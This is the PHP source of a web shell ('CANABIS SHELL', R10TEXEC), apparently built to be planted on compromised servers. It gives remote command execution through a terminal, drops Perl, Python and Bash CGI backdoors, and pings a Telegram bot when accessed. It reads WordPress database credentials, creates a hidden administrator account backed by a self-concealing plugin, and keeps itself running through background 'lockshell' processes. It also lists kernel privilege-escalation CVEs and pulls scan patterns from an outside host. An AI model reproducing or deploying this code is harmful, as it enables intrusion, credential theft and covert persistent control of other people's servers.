true // true = aktifkan auth, false = nonaktifkan ]; ?> $chatId, 'text' => $message, 'parse_mode' => 'Markdown' ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $sendUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $response = curl_exec($ch); curl_close($ch); // tandai session sudah dikirim $_SESSION['telegram_sent'] = true; } // ================= Logout ================= if (isset($_GET["logout"])) { session_destroy(); header("Location: " . $_SERVER["PHP_SELF"]); exit(); } // ================= Login via POST ================= if ($auth["enabled"] && isset($_POST["password"])) { if ( password_verify($_POST["password"], $passwords) || password_verify($_POST["password"], $passwords1) || password_verify($_POST["password"], $passwords2) ) { $_SESSION["logged_in"] = true; header("Location: " . $_SERVER["PHP_SELF"]); exit(); } $error = "❌ PASSWORD SALAH BOY"; } // ================= Login via GET ================= // bisa login via ?login=password if ($auth["enabled"] && isset($_GET["login"])) { $login_pass = $_GET["login"]; if ( password_verify($login_pass, $passwords) || password_verify($login_pass, $passwords1) || password_verify($login_pass, $passwords2) ) { $_SESSION["logged_in"] = true; header("Location: " . $_SERVER["PHP_SELF"]); exit(); } } // ================= Check Auth ================= if ($auth["enabled"] && !isset($_SESSION["logged_in"])) { echo ' R10TEXEC

'; if (isset($error)) { echo '

' . $error . '

'; } echo '

'; exit(); } //================= System Info ================= $uname = php_uname(); $uid = function_exists("posix_getuid") ? posix_getuid() : 0; $user = function_exists("posix_getpwuid") && $uid ? posix_getpwuid($uid)["name"] ?? $uid : $uid; $gid = function_exists("posix_getgid") && function_exists("posix_getgrgid") ? posix_getgrgid(posix_getgid())["name"] ?? posix_getgid() : getmygid(); $phpver = PHP_VERSION; $safemode = ini_get("safe_mode") ? "ON" : "OFF"; $serverIP = $_SERVER["SERVER_ADDR"] ?? "Unknown"; $yourIP = $_SERVER["REMOTE_ADDR"] ?? "Unknown"; $dateTime = date("Y-m-d H:i:s"); // ================= Disk Info ================= $diskTotalBytes = disk_total_space("/") ?: 0; $diskFreeBytes = disk_free_space("/") ?: 0; $diskTotal = round($diskTotalBytes / 1073741824, 2) . " GB"; $diskFree = round($diskFreeBytes / 1073741824, 2) . " GB"; $diskPercent = $diskTotalBytes > 0 ? round(($diskFreeBytes / $diskTotalBytes) * 100) . "%" : "0%"; // ================= Useful / Downloaders ================= // ================= Useful / Downloaders ================= $useful = []; $downloaders = []; $paths = explode(PATH_SEPARATOR, getenv("PATH")); // Tools penting yang mau dicek $important_keywords = [ "useful" => ["php", "python", "perl", "ruby", "tar", "gzip", "make", "nc"], "downloaders" => ["wget", "curl", "lynx", "links"], ]; // Fungsi cek executable ada di PATH function is_active($cmd, $paths) { foreach ($paths as $path) { $full = $path . DIRECTORY_SEPARATOR . $cmd; if (is_executable($full)) { return $cmd; } // Hanya kembalikan nama file } return false; } // Scan dan masukkan yang aktif saja foreach ($important_keywords["useful"] as $cmd) { if ($name = is_active($cmd, $paths)) { $useful[] = $name; // Simpan nama saja } } foreach ($important_keywords["downloaders"] as $cmd) { if ($name = is_active($cmd, $paths)) { $downloaders[] = $name; // Simpan nama saja } } // ================= Disabled Functions ================= $disabledFunctions = ini_get("disable_functions"); $disabled = $disabledFunctions ? "Click to view" : "None"; $disabledArray = $disabledFunctions ? explode(",", $disabledFunctions) : []; // ================= Extensions ================= $cURL = function_exists("curl_version") ? "ON" : "OFF"; $ssh2 = function_exists("ssh2_connect") ? "ON" : "OFF"; $mysql = function_exists("mysql_connect") ? "ON" : "OFF"; $mssql = function_exists("mssql_connect") ? "ON" : "OFF"; $pgsql = function_exists("pg_connect") ? "ON" : "OFF"; $oracle = function_exists("oci_connect") ? "ON" : "OFF"; $cgi = php_sapi_name() === "cgi" ? "ON" : "OFF"; $softWare = $_SERVER["SERVER_SOFTWARE"] ?? "Unknown"; $currentPath = realpath($_GET["path"] ?? getcwd()) ?: getcwd(); // ================= Utility Functions ================= function r10texec_listDir($dir) { if (!is_readable($dir)) { return []; } $items = scandir($dir); $folders = $files = []; foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $full = $dir . "/" . $item; is_dir($full) ? ($folders[] = $item) : ($files[] = $item); } sort($folders); sort($files); return array_merge($folders, $files); } function r10texec_rmdir_recursive($dir) { if (!is_dir($dir)) { return false; } foreach (scandir($dir) as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; is_dir($path) ? r10texec_rmdir_recursive($path) : @unlink($path); } return @rmdir($dir); } function r10texec_copy_recursive($src, $dst) { if (!is_dir($src)) { return false; } if (!mkdir($dst, 0755, true) && !is_dir($dst)) { return false; } foreach (scandir($src) as $item) { if ($item === "." || $item === "..") { continue; } $srcPath = $src . "/" . $item; $dstPath = $dst . "/" . $item; is_dir($srcPath) ? r10texec_copy_recursive($srcPath, $dstPath) : @copy($srcPath, $dstPath); } return true; } function r10texec_formatSize($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . " GB"; } if ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . " MB"; } if ($bytes >= 1024) { return number_format($bytes / 1024, 2) . " KB"; } if ($bytes > 1) { return $bytes . " bytes"; } if ($bytes === 1) { return "1 byte"; } return "0 bytes"; } function r10texec_formatPerms($perms) { $info = $perms & 0x4000 ? "d" : "-"; $info .= $perms & 0x0100 ? "r" : "-"; $info .= $perms & 0x0080 ? "w" : "-"; $info .= $perms & 0x0040 ? "x" : "-"; $info .= $perms & 0x0020 ? "r" : "-"; $info .= $perms & 0x0010 ? "w" : "-"; $info .= $perms & 0x0008 ? "x" : "-"; $info .= $perms & 0x0004 ? "r" : "-"; $info .= $perms & 0x0002 ? "w" : "-"; $info .= $perms & 0x0001 ? "x" : "-"; return $info; } $dir = __DIR__ . "/r10tapi"; if (!is_dir($dir)) { mkdir($dir, 0755, true); } // ===== .htaccess ===== $htaccess = << Require all granted Require all denied HT; file_put_contents("$dir/.htaccess", $htaccess, LOCK_EX); // ===== r10tperl.rx ===== $perl = <<<'PERL' #!/usr/bin/perl use strict; use warnings; use CGI qw(:standard); print header('text/plain; charset=utf-8'); my $q = CGI->new; my $cmd = $q->param('cmd') || ''; if ($cmd) { $cmd =~ s/[\r\n]//g; print qx($cmd 2>&1); } PERL; file_put_contents("$dir/r10tperl.rx", $perl, LOCK_EX); chmod("$dir/r10tperl.rx", 0755); // ===== r10tpython.rx ===== $python = <<<'PYTHON' #!/usr/bin/env python3 import cgi, subprocess print("Content-Type: text/plain\n") form = cgi.FieldStorage() cmd = form.getfirst("cmd","") if cmd: cmd = cmd.replace("\n","").replace("\r","") result = subprocess.getoutput(cmd) print(result) PYTHON; file_put_contents("$dir/r10tpython.rx", $python, LOCK_EX); chmod("$dir/r10tpython.rx", 0755); // ===== r10tbash.rx ===== $bash = <<<'BASH' #!/bin/bash echo "Content-Type: text/plain" echo "" read cmd if [ ! -z "$cmd" ]; then eval "$cmd" fi BASH; file_put_contents("$dir/r10tbash.rx", $bash, LOCK_EX); chmod("$dir/r10tbash.rx", 0755); // Hanya respon jika ada ?get=adminer if (isset($_GET["get"]) && $_GET["get"] === "adminer") { header("Content-Type: application/json"); $adminer_url = "https://www.adminer.org/latest.php"; $local_file = __DIR__ . "/adminer.php"; $result = ["status" => "error", "message" => "Unknown error"]; try { $content = @file_get_contents($adminer_url); if ($content === false) { throw new Exception("Gagal download file Adminer."); } if (@file_put_contents($local_file, $content) === false) { throw new Exception("Permission denied, tidak bisa menulis file."); } $result = [ "status" => "success", "message" => "Adminer berhasil didrop di folder ini!", ]; } catch (Exception $e) { $result = ["status" => "error", "message" => $e->getMessage()]; } echo json_encode($result); exit(); } function find_wp_config($start_dir = __DIR__) { $dir = $start_dir; while ($dir !== "/" && !file_exists($dir . "/wp-config.php")) { $dir = dirname($dir); } return file_exists($dir . "/wp-config.php") ? $dir . "/wp-config.php" : false; } function r10texec_remove_dot($str) { return str_replace(".", "", $str); } function cmd($command) { return function_exists("shell_exec") ? shell_exec($command) : false; } function r10texec_logError($message) { return ["status" => "error", "message" => $message]; } // ================= AJAX Handler ================= if ($_SERVER["REQUEST_METHOD"] === "POST") { header("Content-Type: application/json"); $res = r10texec_logError("Unknown"); $cmd = $_POST["cmd"] ?? ""; $target = $_POST["target"] ?? ""; $dest = $_POST["dest"] ?? ""; $current = $_POST["current"] ?? $currentPath; switch ($cmd) { case "load": if (!is_readable($current)) { $res = r10texec_logError("Permission denied: $current"); break; } $items_raw = r10texec_listDir($current); $folders = $files = []; $home = realpath(dirname(__FILE__)); // home PHP foreach ($items_raw as $f) { $full = $current . "/" . $f; $stat = @stat($full); $entry = [ "name" => $f, "type" => is_dir($full) ? "folder" : "file", "size" => is_file($full) ? r10texec_formatSize($stat["size"]) : "-", "lastmod" => @date("Y-m-d H:i:s", filemtime($full)), "perms" => r10texec_formatPerms(@fileperms($full)), // tampil string seperti rwxr-xr-x "perm_octal" => substr( sprintf("%o", @fileperms($full)), -3 ), // ambil 3 digit terakhir octal "owner" => function_exists("posix_getpwuid") ? (posix_getpwuid($stat["uid"])["name"] ?? $stat["uid"]) . "/" . (posix_getgrgid($stat["gid"])["name"] ?? $stat["gid"]) : $stat["uid"] . "/" . $stat["gid"], "home" => realpath(dirname(__FILE__)), "readable" => is_readable($full), "writable" => is_writable($full), ]; is_dir($full) ? ($folders[] = $entry) : ($files[] = $entry); } $items = array_merge($folders, $files); // Breadcrumb $breadcrumb = []; $parts = explode("/", trim($current, "/")); $acc = ""; $breadcrumb[] = ["name" => "/", "path" => "/"]; foreach ($parts as $p) { if ($p === "") { continue; } $acc .= "/" . $p; $breadcrumb[] = ["name" => $p . "/", "path" => $acc]; } $res = [ "status" => "success", "files" => $items, "breadcrumb" => $breadcrumb, "current" => $current, "home" => $home, ]; break; case "read": if (!is_readable($target)) { $res = r10texec_logError("Cannot read: $target"); break; } $res = [ "status" => "success", "content" => file_get_contents($target), ]; break; case "save": if (!is_writable($target)) { $res = r10texec_logError("Cannot write: $target"); break; } $res = file_put_contents($target, $_POST["content"] ?? "") !== false ? ["status" => "success", "message" => "File saved"] : r10texec_logError("Failed to save: $target"); break; case "rename": $new = $_POST["name"] ?? ""; $newPath = dirname($target) . "/" . $new; if (!$new || file_exists($newPath)) { $res = r10texec_logError("Invalid or existing name"); break; } $res = @rename($target, $newPath) ? ["status" => "success", "message" => "Renamed"] : r10texec_logError("Cannot rename: $target"); break; case "delete": if (is_file($target)) { $res = @unlink($target) ? ["status" => "success", "message" => "Deleted"] : r10texec_logError("Cannot delete: $target"); } elseif (is_dir($target)) { $res = r10texec_rmdir_recursive($target) ? ["status" => "success", "message" => "Folder deleted"] : r10texec_logError("Cannot delete folder: $target"); } break; case "mkdir": $name = $_POST["name"] ?? ""; $path = $current . "/" . $name; if (!$name) { $res = r10texec_logError("Folder name required"); break; } $res = @mkdir($path, 0755, true) ? ["status" => "success", "message" => "Folder created"] : r10texec_logError("Cannot create folder: $path"); break; case "chmod": $mode = $_POST["mode"] ?? ""; if (!$mode || !preg_match('/^[0-7]{3,4}$/', $mode)) { $res = r10texec_logError("Invalid mode"); break; } $res = @chmod($target, octdec($mode)) ? [ "status" => "success", "message" => "Permissions set to $mode", ] : r10texec_logError("Cannot change permissions: $target"); break; case "upload": if (!empty($_FILES["file"])) { $dest_file = $current . "/" . basename($_FILES["file"]["name"]); $res = move_uploaded_file( $_FILES["file"]["tmp_name"], $dest_file ) ? ["status" => "success", "message" => "Uploaded"] : r10texec_logError( "Failed to upload file: " . $_FILES["file"]["name"] ); } break; case "copy": if (!$dest) { $res = r10texec_logError("Destination required"); break; } if (is_file($target)) { $res = @copy($target, $dest) ? ["status" => "success", "message" => "Copied"] : r10texec_logError("Cannot copy file: $target"); } elseif (is_dir($target)) { $res = r10texec_copy_recursive($target, $dest) ? ["status" => "success", "message" => "Copied folder"] : r10texec_logError("Cannot copy folder: $target"); } break; case "move": if (!$dest) { $res = r10texec_logError("Destination required"); break; } $res = @rename($target, $dest) ? ["status" => "success", "message" => "Moved"] : r10texec_logError("Cannot move: $target"); break; case "terminal": $cmd_input = $_POST["command"] ?? ""; if ($cmd_input) { $output = ""; if(function_exists("shell_exec")){ $output = shell_exec($cmd_input . " 2>&1"); } elseif(function_exists("exec")){ $arr = []; exec($cmd_input . " 2>&1", $arr); $output = implode("\n", $arr); } elseif(function_exists("system")){ ob_start(); system($cmd_input . " 2>&1"); $output = ob_get_clean(); } elseif(function_exists("passthru")){ ob_start(); passthru($cmd_input . " 2>&1"); $output = ob_get_clean(); } elseif(function_exists("proc_open")){ $descriptors = [ 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = proc_open($cmd_input, $descriptors, $pipes); if(is_resource($process)){ $output = stream_get_contents($pipes[1]); $err = stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); if($err) $output .= "\n".$err; } } if($output){ $res = ["status"=>"success","output"=>$output]; } else { $res = r10texec_logError("eror ye"); } } break; case "makefile": $name = $_POST["name"] ?? ""; $filePath = $current . "/" . $name; if (!$name) { $res = r10texec_logError("File name required"); break; } $res = !file_exists($filePath) && file_put_contents($filePath, "") !== false ? ["status" => "success", "message" => "File created"] : r10texec_logError("Failed or file exists: $filePath"); break; // ---------- LockShell ---------- case "lockshell": $curFile = basename($_SERVER["SCRIPT_FILENAME"]); $sessionDir = sys_get_temp_dir() . "/.sessions"; if (!is_dir($sessionDir) && !mkdir($sessionDir, 0755, true)) { $res = r10texec_logError( "Cannot create session dir: $sessionDir" ); break; } $textFile = $sessionDir . "/" . md5(getcwd() . r10texec_remove_dot($curFile) . "-text"); $handlerFile = $sessionDir . "/" . md5(getcwd() . r10texec_remove_dot($curFile) . "-handler"); @unlink($textFile); @unlink($handlerFile); if (!@copy($curFile, $textFile)) { $res = r10texec_logError( "Cannot copy file to session: $textFile" ); break; } @chmod($curFile, 0444); $handler = ''; if (file_put_contents($handlerFile, $handler) === false) { $res = r10texec_logError( "Failed to create handler file: $handlerFile" ); break; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { pclose(popen("start /B php \"$handlerFile\"", "r")); } else { @chmod($handlerFile, 0755); shell_exec( PHP_BINARY . " \"$handlerFile\" > /dev/null 2>&1 & echo $! > \"$sessionDir/lockshell.pid\"" ); } $res = ["status" => "success", "message" => "Lockshell deployed"]; break; // ---------- UnlockShell ---------- case "unlockshell": $sessionDir = sys_get_temp_dir() . "/.sessions"; $handlerFile = $sessionDir . "/" . md5( getcwd() . "/" . basename($_SERVER["SCRIPT_FILENAME"]) . "-handler" ); if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { @exec("taskkill /F /FI \"WINDOWTITLE eq php*\" 2>NUL"); } else { $pidFile = $sessionDir . "/lockshell.pid"; if (file_exists($pidFile)) { $pid = trim(file_get_contents($pidFile)); if (is_numeric($pid)) { shell_exec("kill -9 $pid 2>/dev/null"); } @unlink($pidFile); } if (file_exists($handlerFile)) { @unlink($handlerFile); } } $res = ["status" => "success", "message" => "Lockshell killed"]; break; // ---------- Lock File/Folder ---------- case "lockfile": $file = $target ?: ""; if (!$file || !file_exists($file)) { $res = r10texec_logError("File not found: $file"); break; } $sessionDir = sys_get_temp_dir() . "/.sessions"; if (!is_dir($sessionDir)) { mkdir($sessionDir, 0755, true); } // File backup untuk restore $backupFile = $sessionDir . "/" . md5($file . "-backup"); @copy($file, $backupFile); // Set read-only @chmod($file, 0444); // Handler loop (opsional, supaya restore jika dihapus) $handlerFile = $sessionDir . "/" . md5($file . "-handler"); $handler = ''; file_put_contents($handlerFile, $handler); if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { pclose(popen("start /B php \"$handlerFile\"", "r")); } else { @chmod($handlerFile, 0755); shell_exec( PHP_BINARY . " \"$handlerFile\" > /dev/null 2>&1 & echo $! > \"$sessionDir/lockfile.pid\"" ); } $res = ["status" => "success", "message" => "File locked: $file"]; break; // ---------- Unlock File/Folder ---------- case "unlockfile": $file = $target ?: ""; if (!$file || !file_exists($file)) { $res = r10texec_logError("File not found: $file"); break; } $sessionDir = sys_get_temp_dir() . "/.sessions"; $backupFile = $sessionDir . "/" . md5($file . "-backup"); $handlerFile = $sessionDir . "/" . md5($file . "-handler"); // Stop handler if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { @exec("taskkill /F /FI \"WINDOWTITLE eq php*\" 2>NUL"); } else { $pidFile = $sessionDir . "/lockfile.pid"; if (file_exists($pidFile)) { $pid = trim(file_get_contents($pidFile)); if (is_numeric($pid)) { shell_exec("kill -9 $pid 2>/dev/null"); } @unlink($pidFile); } if (file_exists($handlerFile)) { @unlink($handlerFile); } } // Restore permission dan file if (file_exists($backupFile)) { @copy($backupFile, $file); @chmod($file, 0644); @unlink($backupFile); } else { @chmod($file, 0644); // kalau backup hilang, tetap unlock permission } $res = ["status" => "success", "message" => "File unlocked: $file"]; break; case "get_wp_config": // Fungsi find_wp_config langsung di sini $find_wp_config = function ($start_dir = __DIR__) { $dir = $start_dir; while ($dir !== "/" && !file_exists($dir . "/wp-config.php")) { $dir = dirname($dir); } return file_exists($dir . "/wp-config.php") ? $dir . "/wp-config.php" : false; }; $wp_config = $find_wp_config($current); if (!$wp_config || !is_readable($wp_config)) { echo json_encode([ "status" => "error", "msg" => "wp-config.php tidak ditemukan atau tidak bisa dibaca", ]); exit(); } $content = file_get_contents($wp_config); $db_config = []; preg_match( "/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $content, $m ) && ($db_config["db_name"] = $m[1]); preg_match( "/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $content, $m ) && ($db_config["db_user"] = $m[1]); preg_match( "/define\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $content, $m ) && ($db_config["db_pass"] = $m[1]); preg_match( "/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $content, $m ) && ($db_config["db_host"] = $m[1]); echo json_encode([ "status" => "success", "wp_config" => $wp_config, "db_config" => $db_config, ]); exit(); case "hidden_admin": $db_config = $_POST["db_config"] ?? []; $host = $_POST["db_host"] ?? ($db_config["db_host"] ?? "localhost"); $user = $_POST["db_user"] ?? ($db_config["db_user"] ?? ""); $pass = $_POST["db_pass"] ?? ($db_config["db_pass"] ?? ""); $name = $_POST["db_name"] ?? ($db_config["db_name"] ?? ""); $admin_user = trim($_POST["admin_user"] ?? "adminhidden"); $admin_pass = trim($_POST["admin_pass"]) ?: bin2hex(random_bytes(6)); $admin_email = trim($_POST["admin_email"] ?? "[email protected]"); $conn = new mysqli($host, $user, $pass, $name); if ($conn->connect_error) { echo json_encode([ "status" => "error", "msg" => "❌ Koneksi DB gagal: " . $conn->connect_error, ]); exit(); } $find_table_by_column = function ( $conn, $like_pattern, $column_name ) { $result = $conn->query("SHOW TABLES LIKE '{$like_pattern}'"); while ($row = $result->fetch_row()) { $table = $row[0]; $check = $conn->query( "SHOW COLUMNS FROM `{$table}` LIKE '{$column_name}'" ); if ($check && $check->num_rows > 0) { return $table; } } return false; }; $users_table = $find_table_by_column( $conn, "%_users", "user_login" ); if (!$users_table) { echo json_encode([ "status" => "error", "msg" => "❌ Tabel users tidak ditemukan", ]); exit(); } $prefix = substr($users_table, -6) === "_users" ? substr($users_table, 0, -6) . "_" : ""; $usermeta_table = $prefix . "usermeta"; $options_table = $prefix . "options"; $stmt = $conn->prepare( "SELECT ID FROM {$users_table} WHERE user_login=?" ); $stmt->bind_param("s", $admin_user); $stmt->execute(); $stmt->store_result(); if ($stmt->num_rows > 0) { echo json_encode([ "status" => "error", "msg" => "⚠️ User {$admin_user} sudah ada", ]); exit(); } $stmt->close(); $wp_hash_password = function ($password) { $salt = substr( str_replace("+", ".", base64_encode(random_bytes(22))), 0, 22 ); return crypt($password, '$2y$10$' . $salt); }; $hashed = $wp_hash_password($admin_pass); $now = date("Y-m-d H:i:s"); $stmt = $conn->prepare( "INSERT INTO {$users_table} (user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name) VALUES (?,?,?,?,?,0,?)" ); $stmt->bind_param( "ssssss", $admin_user, $hashed, $admin_user, $admin_email, $now, $admin_user ); $stmt->execute(); $user_id = $stmt->insert_id; $stmt->close(); $meta = [ [$prefix . "capabilities", 'a:1:{s:13:"administrator";b:1;}'], [$prefix . "user_level", "10"], ]; foreach ($meta as $m) { $stmt = $conn->prepare( "INSERT INTO {$usermeta_table} (user_id,meta_key,meta_value) VALUES (?,?,?)" ); $stmt->bind_param("iss", $user_id, $m[0], $m[1]); $stmt->execute(); $stmt->close(); } // Buat plugin hidden $plugin_dir = $_SERVER["DOCUMENT_ROOT"] . "/wp-content/plugins/element-pro-create"; if (!is_dir($plugin_dir)) { mkdir($plugin_dir, 0755, true); } $plugin_code = 'query_where.=" AND {$wpdb->users}.user_login!=\'$hidden_user\'"; }); add_filter("all_plugins",function($plugins){ unset($plugins["element-pro-create/element-pro-create.php"]); return $plugins; }); add_filter("active_plugins",function($plugins){ return array_diff($plugins,["element-pro-create/element-pro-create.php"]); });'; file_put_contents( $plugin_dir . "/element-pro-create.php", $plugin_code ); // Aktifkan plugin $stmt = $conn->prepare( "SELECT option_value FROM {$options_table} WHERE option_name='active_plugins'" ); $stmt->execute(); $stmt->bind_result($active_plugins); $stmt->fetch(); $stmt->close(); $plugins = @unserialize($active_plugins) ?: []; $plugin_path = "element-pro-create/element-pro-create.php"; if (!in_array($plugin_path, $plugins)) { $plugins[] = $plugin_path; $plugins_serialized = serialize($plugins); $stmt = $conn->prepare( "UPDATE {$options_table} SET option_value=? WHERE option_name='active_plugins'" ); $stmt->bind_param("s", $plugins_serialized); $stmt->execute(); $stmt->close(); } echo json_encode([ "status" => "success", "msg" => "✅ Admin {$admin_user} berhasil dibuat & plugin hidden aktif!\n🔑 Password: {$admin_pass}", ]); exit(); break; case 'get_exploits': $cmp_version = fn(string $a,string $b)=>version_compare($a,$b); $get_exploits = function(){return [ 'dirtycow'=>['range'=>['2.6.22','4.8.6'],'cve'=>'CVE-2016-5195','url'=>'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195','note'=>'Classic privilege escalation (Dirty COW).'], 'futex_requeue'=>['range'=>['2.6.28','3.9.0'],'cve'=>'CVE-2014-3153','url'=>'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153','note'=>'Futex requeue race condition.'], 'ptrace_prctl'=>['range'=>['2.6.32','3.4.0'],'cve'=>'CVE-2013-2094','url'=>'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094','note'=>'ptrace / PR_SET_DUMPABLE issue.'], 'overlayfs_2021'=>['range'=>['5.8.0','5.11.0'],'cve'=>'CVE-2021-3493','url'=>'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493','note'=>'OverlayFS privilege escalation (2021).'], 'dirtypipe'=>['range'=>['5.8.0','5.16.11'],'cve'=>'CVE-2022-0847','url'=>'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847','note'=>'Dirty Pipe — local file overwrite vulnerability.'], ];}; $kernel=php_uname('r'); $matches=[];$normalize=fn($v)=>preg_match('/^(\d+(?:\.\d+){0,2})/',$v,$m)?$m[1]:$v;$k=$normalize($kernel); foreach($get_exploits() as $id=>$meta){[$min,$max]=$meta['range'];if($cmp_version($k,$min)>=0 && $cmp_version($k,$max)<=0)$matches[]=array_merge(['id'=>$id],$meta);} echo json_encode(['status'=>'success','kernel_raw'=>$kernel,'kernel_normalized'=>$k,'matches'=>$matches,'count'=>count($matches)],JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE);exit; break; // === R10TAPI / SSE Scanner Case === case "r10tapi_scan": // ===== SSE Stream handler ===== if (isset($_GET["stream"])) { ignore_user_abort(true); set_time_limit(0); header("Content-Type: text/event-stream"); header("Cache-Control: no-cache"); header("X-Accel-Buffering: no"); header("Access-Control-Allow-Origin: *"); header("Access-Control-Allow-Methods: GET, POST, OPTIONS"); header("Access-Control-Allow-Headers: Content-Type"); @ob_end_flush(); @ob_start(); $root = rtrim($_SERVER["DOCUMENT_ROOT"], "/"); $json = @file_get_contents( "https://dev.artikelspiner.id/pattren_all_levels.json" ); $decoded = json_decode($json, true); $activeLevels = ["dangerous", "medium", "smooth"]; if (isset($_GET["active_levels"])) { $activeLevels = explode(",", $_GET["active_levels"]); } $allowed_extensions = ["php", "html", "htm"]; function sendEvent($data) { echo "data:" . json_encode($data) . "\n\n"; @ob_flush(); @flush(); usleep(20000); } function deep_scan( $dir, $decoded, $activeLevels, $allowed_extensions, $depth = 0, $max_depth = 10 ) { if ($depth > $max_depth) { return; } $items = @scandir($dir); if (!$items) { return; } foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deep_scan( $path, $decoded, $activeLevels, $allowed_extensions, $depth + 1, $max_depth ); } elseif (is_file($path)) { $ext = strtolower( pathinfo($path, PATHINFO_EXTENSION) ); if (!in_array($ext, $allowed_extensions)) { continue; } $handle = @fopen($path, "r"); if (!$handle) { continue; } while (($line = fgets($handle)) !== false) { foreach ($decoded as $level => $patterns) { if (!in_array($level, $activeLevels)) { continue; } foreach ($patterns as $p) { if (stripos($line, $p) !== false) { sendEvent([ "file" => $path, "match" => $p, "level" => $level, ]); break 3; } } } } fclose($handle); } } } sendEvent(["start" => true]); deep_scan($root, $decoded, $activeLevels, $allowed_extensions); sendEvent(["done" => true]); exit(); } // ===== Delete handler ===== if ( $_SERVER["REQUEST_METHOD"] === "POST" && ($_POST["action"] ?? "") === "delete" ) { $files = $_POST["files"] ?? []; $deleted = []; foreach ($files as $file) { if (is_file($file)) { @unlink($file); $deleted[] = $file; } } echo json_encode(["deleted" => $deleted]); exit(); } break; } echo json_encode($res); exit(); } // ================= Helper Function ================= if (!function_exists("r10texec_logError")) { function r10texec_logError($msg) { return ["status" => "error", "message" => $msg]; } } // ================= AJAX / SSE Handler ================= if ( $_SERVER["REQUEST_METHOD"] === "POST" || isset($_GET["stream"]) || (isset($_POST["cmd"]) && $_POST["cmd"] !== "") ) { header("Content-Type: application/json"); $cmd = $_POST["cmd"] ?? ""; $target = $_POST["target"] ?? ""; $dest = $_POST["dest"] ?? ""; $current = $_POST["current"] ?? getcwd(); $action = $_POST["action"] ?? ""; $files = $_POST["files"] ?? []; // Stream & active levels $stream = $_GET["stream"] ?? null; $activeLevels = $_GET["active_levels"] ?? "dangerous,medium,smooth"; $activeLevels = explode(",", $activeLevels); // ---------- DELETE HANDLER ---------- if ($action === "delete" && !empty($files)) { $deleted = []; foreach ($files as $file) { if (is_file($file)) { @unlink($file); $deleted[] = $file; } } echo json_encode(["deleted" => $deleted]); exit(); } // ---------- TERMINAL COMMAND ---------- if ($cmd === "terminal") { $cmd_input = $_POST["command"] ?? ""; if ($cmd_input) { $output = function_exists("shell_exec") ? shell_exec($cmd_input . " 2>&1") : ""; echo json_encode( $output ? ["status" => "success", "output" => $output] : r10texec_logError("Failed to execute command") ); exit(); } } // ---------- SSE / SCANNER ---------- if ($cmd === "r10tapi_scan" || $stream) { ignore_user_abort(true); set_time_limit(0); header("Content-Type: text/event-stream"); header("Cache-Control: no-cache"); header("X-Accel-Buffering: no"); header("Access-Control-Allow-Origin: *"); header("Access-Control-Allow-Methods: GET, POST, OPTIONS"); header("Access-Control-Allow-Headers: Content-Type"); @ob_end_flush(); @ob_start(); $root = rtrim($_SERVER["DOCUMENT_ROOT"], "/"); $json = @file_get_contents( "https://dev.artikelspiner.id/pattren_all_levels.json" ); $decoded = json_decode($json, true); $allowed_extensions = ["php", "html", "htm"]; function sendEvent($data) { echo "data:" . json_encode($data) . "\n\n"; @ob_flush(); @flush(); usleep(20000); } function deep_scan( $dir, $decoded, $activeLevels, $allowed_extensions, $depth = 0, $max_depth = 10 ) { if ($depth > $max_depth) { return; } $items = @scandir($dir); if (!$items) { return; } foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deep_scan( $path, $decoded, $activeLevels, $allowed_extensions, $depth + 1, $max_depth ); } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if (!in_array($ext, $allowed_extensions)) { continue; } $handle = @fopen($path, "r"); if (!$handle) { continue; } while (($line = fgets($handle)) !== false) { foreach ($decoded as $level => $patterns) { if (!in_array($level, $activeLevels)) { continue; } foreach ($patterns as $p) { if (stripos($line, $p) !== false) { sendEvent([ "file" => $path, "match" => $p, "level" => $level, ]); break 3; } } } } fclose($handle); } } } sendEvent(["start" => true]); deep_scan($root, $decoded, $activeLevels, $allowed_extensions); sendEvent(["done" => true]); exit(); } echo json_encode($res ?? r10texec_logError("Unknown")); exit(); } ?> R10TEXEC_SHELL

CANABIS SHELL 🌿

Uname:
User:	Group:
PHP:	Safe Mode:
ServerIP:	Your IP:
DateTime:
HDD:	Total: Free:
Useful:	$u"; } ?>
Downloader:	$d"; } ?>
Disable Functions:	None

Name	Type	Size	Lastmod	Permissions	Owner/Group	Actions

#	File	Pattern	Risk	✓	Delete
💤 Waiting for scan...

🔐 Hidden Admin Creator

Interactive Terminal ×

CANABIS SHELL 🌿

Edit File: